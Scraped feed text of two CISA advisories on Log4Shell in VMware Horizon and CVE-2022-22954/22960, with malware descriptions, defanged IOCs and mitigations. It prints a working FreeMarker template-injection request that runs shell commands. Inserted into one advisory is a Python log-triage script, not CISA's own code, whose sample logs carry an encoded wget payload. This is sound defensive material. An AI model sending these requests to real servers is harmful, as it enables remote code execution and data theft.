compromise, the actors collected and exfiltrated sensitive information from the victim\u2019s network. \n\nThe sections below provide information CISA and CGCYBER obtained during incident response activities at two related confirmed compromises.\n\n#### Victim 1\n\nCGCYBER conducted a proactive threat-hunting engagement at an organization (Victim 1) compromised by actors exploiting Log4Shell in VMware Horizon. After obtaining access, threat actors uploaded malware, `hmsvc.exe`, to a compromised system. During malware installation, connections to IP address `104.223.34[.]198` were observed. \n\nCISA and CGCYBER analyzed a sample of `hmsvc.exe` from the confirmed compromise. 
`hmsvc.exe` masquerades as a legitimate Microsoft\u00ae Windows\u00ae service (SysInternals LogonSessions software) [[T1036.004](<https://attack.mitre.org/versions/v11/techniques/T1036/004/>)] and appears to be a modified version of SysInternals LogonSessions software embedded with malicious packed code. When discovered, the analyzed sample of `hmsvc.exe` was running as `NT AUTHORITY\\SYSTEM`, the highest privilege level on a Windows system. It is unknown how the actors elevated privileges. \n\n`hmsvc.exe` is a Windows loader containing an embedded executable, `658_dump_64.exe`. The embedded executable is a remote access tool that provides an array of C2 capabilities, including the ability to log keystrokes [[T1056.001](<https://attack.mitre.org/versions/v11/techniques/T1056/001/>)], upload and execute additional payloads [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)], and provide graphical user interface (GUI) access over a target Windows system's desktop. The malware can function as a C2 tunneling proxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)], allowing a remote operator to pivot to other systems and move further into a network.\n\nWhen first executed, `hmsvc.exe` creates the Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005/>)], `C:\\Windows\\System32\\Tasks\\Local Session Updater`, which executes malware every hour. When executed, two randomly named `*.tmp` files are written to the disk at the location `C:\\Users\\<USER>\\AppData\\Local\\Temp\\` and the embedded executable attempts to connect to hard-coded C2 server `192.95.20[.]8` over port `4443`, a non-standard port [[T1571](<https://attack.mitre.org/versions/v11/techniques/T1571/>)]. 
The executable\u2019s inbound and outbound communications are encrypted with a 128-bit key [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)].\n\nFor more information on `hmsvc.exe`, including IOCs and detection signatures, see [MAR-10382254-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174a>).\n\n#### Victim 2\n\nFrom late April through May 2022, CISA conducted an onsite incident response engagement at an organization (Victim 2) where CISA observed bi-directional traffic between the organization and suspected APT IP address `104.223.34[.]198`. During incident response, CISA determined Victim 2 was compromised by multiple threat actor groups. \n\nThe threat actors using IP `104.223.34[.]198` gained initial access to Victim 2\u2019s production environment in late January 2022, or earlier. These actors likely obtained access by exploiting Log4Shell in an unpatched VMware Horizon server. On or around January 30, likely shortly after the threat actors gained access, CISA observed the actors using PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v11/techniques/T1059/001/>)] to call out to `109.248.150[.]13` via Hypertext Transfer Protocol (HTTP) [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)] to retrieve additional PowerShell scripts. Around the same period, CISA observed the actors attempt to download [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] and execute a malicious file from `109.248.150[.]13`. The activity started from IP address `104.155.149[.]103`, which appears to be part of the actors\u2019 C2 [[TA0011](<https://attack.mitre.org/versions/v11/tactics/TA0011/>)] infrastructure. 
\n\nAfter gaining initial access to the VMware Horizon server, the threat actors moved laterally [[TA0008](<https://attack.mitre.org/versions/v11/tactics/TA0008/>)] via Remote Desktop Protocol (RDP) [[T1021.001](<https://attack.mitre.org/versions/v11/techniques/T1021/001/>)] to multiple other hosts in the production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. The threat actors also moved laterally via RDP to the organization\u2019s disaster recovery network. The threat actors gained credentials [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)] for multiple accounts, including administrator accounts. It is unknown how these credentials were acquired. \n\nAfter moving laterally to other production environment hosts and servers, the actors implanted loader malware on compromised servers containing executables enabling remote C2. The threat actors used compromised administrator accounts to run the loader malware. The loader malware appears to be modified versions of SysInternals LogonSessions, Du, or PsPing software. The embedded executables belong to the same malware family, are similar in design and functionality to `658_dump_64.exe`, and provide C2 capabilities to a remote operator. These C2 capabilities include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payloads. The embedded executables can also function as a proxy. \n\nCISA found the following loader malware:\n\n * `SvcEdge.exe` is a malicious Windows loader containing encrypted executable `f7_dump_64.exe`. When executed, `SvcEdge.exe` decrypts and loads `f7_dump_64.exe` into memory. During runtime, `f7_dump_64.exe` connects to hard-coded C2 server `134.119.177[.]107` over port `443`. \n * `odbccads.exe` is a malicious Windows loader containing an encrypted executable. 
When executed, `odbccads.exe` decrypts and loads the executable into memory. The executable attempts communication with the remote C2 address `134.119.177[.]107`. \n * `praiser.exe` is a Windows loader containing an encrypted executable. When executed, `praiser.exe` decrypts and loads the executable into memory. The executable attempts connection to hard-coded C2 address `162.245.190[.]203`.\n * `fontdrvhosts.exe` is a Windows loader that contains an encrypted executable. When executed, `fontdrvhosts.exe` decrypts and loads the executable into memory. The executable attempts connection to hard-coded C2 address `155.94.211[.]207`.\n * `winds.exe` is a Windows loader containing an encrypted malicious executable and was found on a server running as a service. During runtime, the encrypted executable is decrypted and loaded into memory. The executable attempts communication with hard-coded C2 address `185.136.163[.]104`. `winds.exe` has complex obfuscation, hindering the analysis of its code structures. The executable\u2019s inbound and outbound communications are encrypted with an XOR key [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)].\n\nFor more information on these malware samples, including IOCs and detection signatures, see [MAR-10382580-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174b>).\n\nAdditionally, CISA identified a Java\u00ae Server Pages (JSP) application (`error_401.jsp`) functioning as a malicious webshell [[T1505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] and a malicious Dynamic Link Library (DLL) file:\n\n * `error_401.jsp` is a webshell designed to parse data and commands from incoming HTTP requests, providing a remote operator C2 capabilities over compromised Linux and Windows systems. `error_401.jsp` allows actors to retrieve files from the target system, upload files to the target system, and execute commands on the target system. 
`rtelnet` is used to execute commands on the target system. Commands and data sent are encrypted via RC4 [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)]. For more information on `error_401.jsp`, including IOCs, see [MAR-10382580-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-197a>).\n * `newdev.dll` ran as a service in the profile of a known compromised user on a mail relay server. The malware had path: `C:\\Users\\<user>\\AppData\\Roaming\\newdev.dll`. The DLL may be the same `newdev.dll` attributed to the APT actors in [open-source reporting](<https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits>); however, CISA was unable to recover the file for analysis. \n\nThreat actors collected [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] and likely exfiltrated [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)] data from Victim 2\u2019s production environment. For a three-week period, the security management and certificate servers communicated with the foreign IP address `92.222.241[.]76`. During this same period, the security management server sent more than 130 gigabytes (GB) of data to foreign IP address `92.222.241[.]76`, indicating the actors likely exfiltrated data from the production environment. CISA also found `.rar` files containing sensitive law enforcement investigation data [[T1560.001](<https://attack.mitre.org/versions/v11/techniques/T1560/001/>)] under a known compromised administrator account.\n\n**Note:** the second threat actor group had access to the organization's test and production environments, and on or around April 13, 2022, leveraged CVE-2022-22954 to implant the Dingo J-spy webshell. According to trusted third-party reporting, multiple large organizations have been targeted by cyber actors leveraging CVE-2022-22954 and CVE-2022-22960. 
For more information on exploitation of CVE-2022-22954 and CVE-2022-22960, see CISA CSA [Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\n### Incident Response\n\nIf administrators discover system compromise, CISA and CGCYBER recommend:\n\n 1. Immediately isolating affected systems. \n 2. Collecting and reviewing relevant logs, data, and artifacts.\n 3. Considering soliciting support from a third-party incident response organization that can provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.\n 4. Reporting incidents to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870). To report cyber incidents to the Coast Guard pursuant to 33 CFR Section 101.305, contact the U.S. Coast Guard (USCG) National Response Center (NRC) ([NRC@uscg.mil](<mailto:NRC@uscg.mil>) or 800-424-8802). \n\n### Mitigations\n\nCISA and CGCYBER recommend organizations install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.\n\n * If updates or workarounds were not promptly applied following VMware\u2019s [release of updates for Log4Shell in December 2021](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), **treat those VMware Horizon systems as compromised**. Follow the pro-active incident response procedures outlined above prior to applying updates. If no compromise is detected, apply these updates as soon as possible. 
\n * See VMware Security Advisory [VMSA-2021-0028.13](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) and [VMware Knowledge Base (KB) 87073](<https://kb.vmware.com/s/article/87073>) to determine which VMware Horizon components are vulnerable.\n * **Note: **until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.\n * If upgrading is not immediately feasible, see [KB87073](<https://kb.vmware.com/s/article/87073>) and [KB87092](<https://kb.vmware.com/s/article/87092>) for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible. \n * Prior to implementing any temporary solution, ensure appropriate backups have been completed. \n * Verify successful implementation of mitigations by executing the vendor supplied script `Horizon_Windows_Log4j_Mitigations.zip` without parameters to ensure that no vulnerabilities remain. See [KB87073](<https://kb.vmware.com/s/article/87073>) for details. \n\nAdditionally, CISA and CGCYBER recommend organizations:\n\n * Keep all software up to date and prioritize patching [known exploited vulnerabilities (KEVs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Minimize the internet-facing attack surface by hosting essential services on a segregated DMZ, ensuring strict network perimeter access controls, and not hosting internet-facing services non-essential to business operations. Where possible, implement regularly updated WAFs in front of public-facing services. 
WAFs can protect against web-based exploitation using signatures and heuristics that are likely to block or alert on malicious traffic.\n * Use best practices for identity and access management (IAM) by implementing multifactor authentication (MFA), enforcing use of strong passwords, and limiting user access through the principle of least privilege.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information related to this threat.\n\n * To request incident response resources or technical assistance related to these threats, email CISA at [report@cisa.gov](<mailto:report@cisa.gov>). To contact Coast Guard Cyber Command in relation to these threats, email [maritimecyber@uscg.mil](<mailto:maritimecyber@uscg.mil>).\n * To report cyber incidents to the Coast Guard pursuant to 33 CFR Section 101.305, contact the USCG NRC ([NRC@uscg.mil](<mailto:NRC@uscg.mil>) or 800-424-8802).\n\n### Resources\n\n * For more information on Log4Shell, see: \n * CISA\u2019s [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) webpage,\n * Joint CSA [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>), or\n * CISA\u2019s [database of known vulnerable services](<https://github.com/cisagov/log4j-affected-db>) on the CISA GitHub\u00ae page.\n * See National Security Agency (NSA) and Australian Signals Directorate (ASD) guidance [Block and Defend Web Shell Malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>) for additional guidance on hardening internet-facing systems.\n\n### References\n\n[1] VMware Security Advisory [VMSA-2021-0028.13](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) \n[2] Fortinet\u2019s blog [New Milestones for Deep Panda: Log4Shell and Digitally Signed Fire Chili 
Rootkits](<https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits>)\n\n### Appendix A: Indicators of Compromise\n\nSee [MAR-10382580-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174b>) and [MAR-10382254-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174a>) and Table 1 for IOCs. See the list below to download copies of these IOCs: \n\n * MAR-10382580-1 stix\n * MAR-10382254-1 stix\n\n**_Table 1: Indicators of Compromise_**\n\nType | Indicator | Description \n---|---|--- \nIP Address | `104.223.34[.]198` | IP address closely associated with the installation of malware on victims. \n | `92.222.241[.]76` | Victim 2 servers communicated with this IP address and sent data to it during a three-week period. \n | `109.248.150[.]13` | Actors attempted to download and execute a malicious file from this address. \n | `104.155.149[.]103` | Appears to be a part of the actors\u2019 C2 infrastructure. \nNetwork Port | `192.95.20[.]8:80` | Same description as IP `192.95.20[.]8`, but includes the specific destination port of 80, which was identified in logs and during malware analysis. \n | `1389` | This was the most common destination port for Log4Shell exploitation outbound connections. Multiple unique destination addresses were used for Log4Shell callback. \n | `104.223.34[.]198:443` | IP address closely associated with the installation of malware on victims, with the specific destination port of 443. \nScheduled Task | `C:\\Windows\\System32\\Tasks\\Local Session Update` | Scheduled task created by `hmsvc.exe` to execute the program hourly. \nFile Path | `C:\\Windows\\Temp\\lnk{4_RANDOM_CHARS}.tmp` | File created by `hmsvc.exe` with a random four-character filename. \n | `C:\\Windows\\Temp\\lnk<4_RANDOM_NUMS_CHARS>.tmp` | File created by `hmsvc.exe` with a random four-character filename. \n \n### Appendix B: Threat Actor TTPs\n\nSee Table 2 for the threat actors\u2019 tactics and techniques identified in this CSA. 
See the [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework, version 11, for all referenced threat actor tactics and techniques.\n\n**_Table 2: Tactics and Techniques_**\n\nTactic | Technique \n---|--- \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)] | Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)] \nExecution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002/>)] | Command and Scripting Interpreter: PowerShell [[T1059.001](<https://attack.mitre.org/versions/v11/techniques/T1059/001/>)] \n | Scheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005/>)] \nPersistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003/>)] | Server Software Component: Web Shell [[T1505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] \nDefense Evasion [[TA0005](<https://attack.mitre.org/versions/v11/tactics/TA0005/>)] | Masquerading: Masquerade Task or Service [[T1036.004](<https://attack.mitre.org/versions/v11/techniques/T1036/004/>)] \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)] | \nLateral Movement [[TA0008](<https://attack.mitre.org/versions/v11/tactics/TA0008/>)] | Remote Services: Remote Desktop Protocol [[T1021.001](<https://attack.mitre.org/versions/v11/techniques/T1021/001/>)] \nCollection [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] | Archive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v11/techniques/T1560/001/>)] \n | Input Capture: Keylogging [[T1056.001](<https://attack.mitre.org/versions/v11/techniques/T1056/001/>)] \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v11/tactics/TA0011/>)] | Application Layer Protocol: Web Protocols [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)] \n | Encrypted 
Channel: Symmetric Cryptography [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)] \n | Ingress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] \n | Non-Standard Port [[T1571](<https://attack.mitre.org/versions/v11/techniques/T1571/>)] \n | Proxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)] \n \n### Disclaimer\n\n\u00a9 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.\n\n### Acknowledgements\n\nCISA and CGCYBER would like to thank VMware and Secureworks for their contributions to this CSA.\n\n### Revisions\n\nJune 23, 2022: Initial version | June 24, 2022: Added link to AA22-174A.stix.xml | July 18, 2022: MAR-10382580-2 stix\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-18T12:00:00", "type": "ics", "title": "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-07-18T12:00:00", "id": "AA22-174A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-174a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:26:53", "description": "### Summary\n\n**_Update June 2, 2022:_**\n\nThis Cybersecurity Advisory (CSA) has been updated with additional indicators of compromise (IOCs) and detection signatures, as well as tactics, techniques, and procedures (TTPs) from trusted third parties. \n\n**_Update End_**\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this CSA to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). \n\nVMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of [Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on April 14 and April 15, respectively. 
In accordance with [Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5 and May 6, 2022, respectively.\n\n**Note:** based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released [Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities](<https://www.cisa.gov/emergency-directive-22-03>), which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove the affected software from their network until the updates can be applied.\n\nCISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information\u2014including IOCs\u2014about observed exploitation at multiple other large organizations from trusted third parties.\n\nThis CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. \n\n_**Update June 2, 2022:**_\n\nThis CSA also provides TTPs of this activity from trusted third parties to assist administrators with detecting and responding to this activity. \n\n_**Update End**_\n\nDue to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with internet-facing affected systems\u2014that did not immediately apply updates\u2014to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. 
If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.\n\nDownload the PDF version of this report (pdf, 349kb).\n\nFor a downloadable copy of IOCs, see AA22-138B.stix. \n\n### Technical Details\n\nCISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.\n\n * [CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954>) enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[[1](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)] \n * VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n * vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3\n * VMware Cloud Foundation, 4.x\n * vRealize Suite LifeCycle Manager, 8.x\n * [CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960>) enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[[2](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)] \n * VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n * vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3\n * vRA, version 7.6 \n * VMware Cloud Foundation, 3.x, 4.x, \n * vRealize Suite LifeCycle Manager, 8.x\n\nAccording to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. 
The actor then exploited CVE-2022-22960 to escalate the user\u2019s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems. \n\n_**Update June 2, 2022:**_\n\nFor more information about this compromised organization, see the Victim 1 section.\n\n_**Update End**_\n\nThreat actors have dropped post-exploitation tools, including the Dingo J-spy webshell, a publicly available webshell that includes command execution, a file manager, a database manager, and a port scanner. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. **Note:** analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.\n\n**_Update June 2, 2022:_**\n\nThe following sections include additional information, including IOCs and TTPs, from trusted third parties about two confirmed compromises. See the appendix for TTPs in this CSA mapped to the MITRE ATT&CK for Enterprise framework.\n\n### Victim 1 \n\nThe trusted third party assesses that multiple threat actors (referred to as Threat Actor 1 [TA1] and Threat Actor 2 [TA2]) gained access to a public-facing server running VMWare Workspace ONE Access. TA1 downloaded a malicious shell script, which they used to collect and exfiltrate sensitive data. 
TA2 interacted with the server manually (without automation or scripts) and installed multiple webshells and a reverse SOCKS proxy.\n\n#### **Threat Actor 1**\n\nOn April 12, TA1 exploited CVE-2022-22954 [[T1203](<https://attack.mitre.org/versions/v11/techniques/T1203>)] to download [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] a malicious shell script [[T1059](<https://attack.mitre.org/versions/v11/techniques/T1059/>)] from `https://20.232.97[.]189/up/80b6ae2cea.sh`. \n\nTA1 targeted FreeMarker, the Java template engine the product uses to render customized notifications, by sending GET requests of the following form to the compromised server [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)]; the `deviceUdid` parameter carries a URL-encoded template expression that instantiates `freemarker.template.utility.Execute` and runs a shell command:\n\n`GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7D HTTP/1.1`\n\nThe request shown runs `cat` against the product configuration file; the same injection point was used to download the malicious shell script `80b6ae2cea[.]sh` into the VMware Workspace ONE Access directory `/usr/local/horizon/scripts/`. TA1 then chained CVE-2022-22960 to the initial exploit to run the shell script with root privileges ([[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)], [[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004/>)]). The script was executed with the `sudo` command.\n\nThe script, which contained VMware Workspace ONE Access directory paths and file locations, was developed for data exfiltration [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)]. 
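The request above is the whole exploitation primitive: a URL-encoded FreeMarker expression in `deviceUdid` that instantiates `freemarker.template.utility.Execute` and hands it a shell command. The hunting advice later in this CSA (search `greenbox_web.log` for `freemarker.template.utility.Execute` after URL-decoding) is easy to get wrong when the payload is double-encoded. The following Python triage script is an added example, not CISA's or VMware's code: it decodes each request URI until it stops changing, flags `Execute` calls and extracts the injected command, and separately flags bare `${...}` probes against the vulnerable endpoint. The log lines are constructed, and the `"GET <uri> HTTP/1.1"` layout they use is an assumption; adjust `REQUEST_RE` to the real `greenbox_web.log` format before use.

```python
import re
from urllib.parse import unquote

# Constructed greenbox_web.log-style lines (not real victim data). The request
# layout 'GET <uri> HTTP/1.1' is an assumption about the log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Apr/2022:10:01:02 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 1234',
    # single URL-encoded FreeMarker Execute call, same shape as the TA1 request
    '198.51.100.20 - - [12/Apr/2022:10:02:17 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7D HTTP/1.1" 400 0',
    # double URL-encoded variant that a single decode (or a naive grep) misses
    '198.51.100.21 - - [12/Apr/2022:10:03:40 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%2528%2529%2528%2522wget%2520-qO-%2520http://198.51.100.7/one%2522%2529%257D HTTP/1.1" 400 0',
    # template-expression probe with no command: worth a look, but not proof of RCE
    '198.51.100.22 - - [12/Apr/2022:10:04:01 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B7*7%7D HTTP/1.1" 400 0',
]

VULN_PATH = "/catalog-portal/ui/oauth/verify"
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')
# Matches the decoded gadget: "freemarker.template.utility.Execute"?new()("<command>")}
EXECUTE_RE = re.compile(
    r'freemarker\.template\.utility\.Execute["\']?\s*\?\s*new\s*\(\s*\)\s*\(\s*["\'](?P<cmd>.*?)["\']\s*\)\s*\}',
    re.IGNORECASE | re.DOTALL,
)


def url_decode_fully(value, max_rounds=4):
    """Percent-decode until the string stops changing (bounded) so nested encodings unwrap."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(uri):
    """Return ('ssti-exec', command), ('ssti-probe', None) or None for a decoded URI."""
    hit = EXECUTE_RE.search(uri)
    if hit:
        return "ssti-exec", hit.group("cmd")
    if uri.startswith(VULN_PATH) and "${" in uri:
        return "ssti-probe", None
    return None


def triage(lines):
    """Decode every request URI and collect suspected CVE-2022-22954 activity."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        uri = url_decode_fully(m.group(1))
        verdict = classify_request(uri)
        if verdict:
            findings.append({"line": number, "verdict": verdict[0], "command": verdict[1], "uri": uri})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f['line']}: {f['verdict']}  command={f['command']!r}")
```

A hit is a lead, not a verdict: the CSA notes that `freemarker.template.utility.Execute` can appear legitimately, so review the extracted command and the source address before escalating.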
The malicious script collected [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] sensitive files\u2013including user names, passwords, master keys, and firewall rules\u2013and stored them in a tar ball (a tar archive, optionally compressed, used here to stage collected data for exfiltration) [[T1560](<https://attack.mitre.org/versions/v11/techniques/T1560/>)]. The tar ball was placed under the web root, in the VMware Workspace ONE Access directory `/opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/`, where it could later be fetched with an ordinary GET request.\n\nThe malicious script then deleted evidence of compromise [[TA0005](<https://attack.mitre.org/versions/v11/tactics/TA0005/>)] by restoring modified logs to their original state and deleting files [[T1070](<https://attack.mitre.org/versions/v11/techniques/T1070/>)]. TA1 deleted many files and logs, including `fd86ald0.pem`, the `localhost_access` logs, logs associated with the VMware Horizon application, and greenbox logs for the date of activity (April 12). \n\n**Note:** CISA received a similar malicious Bash script for analysis from a trusted third party at a different known compromise. See the Victim 2 section for more information.\n\nOn April 12, TA1 also downloaded `jtest.jsp`, a JSP webshell, to the server\u2019s web directory `/SAAS/Horizon/js-lib/` from IP address `186.233.187[.]245`.\n\nTA1 returned to the server on April 12 to collect the sensitive data stored in the tar ball by GET request.\n\n#### **Threat Actor 2**\n\nOn April 13 and 14, TA2 sent many GET requests to the server exploiting\u2014or attempting to exploit\u2014CVE-2022-22954 to obtain RCE, upload binaries, and upload webshells [[T1505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] for persistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003/>)].\n\n * On April 13, TA2 attempted to download a webshell `app.jsp` (MD5 `4cd8366345ad4068feca4d417738b4bd`) from IP address `51.79.171[.]53`. 
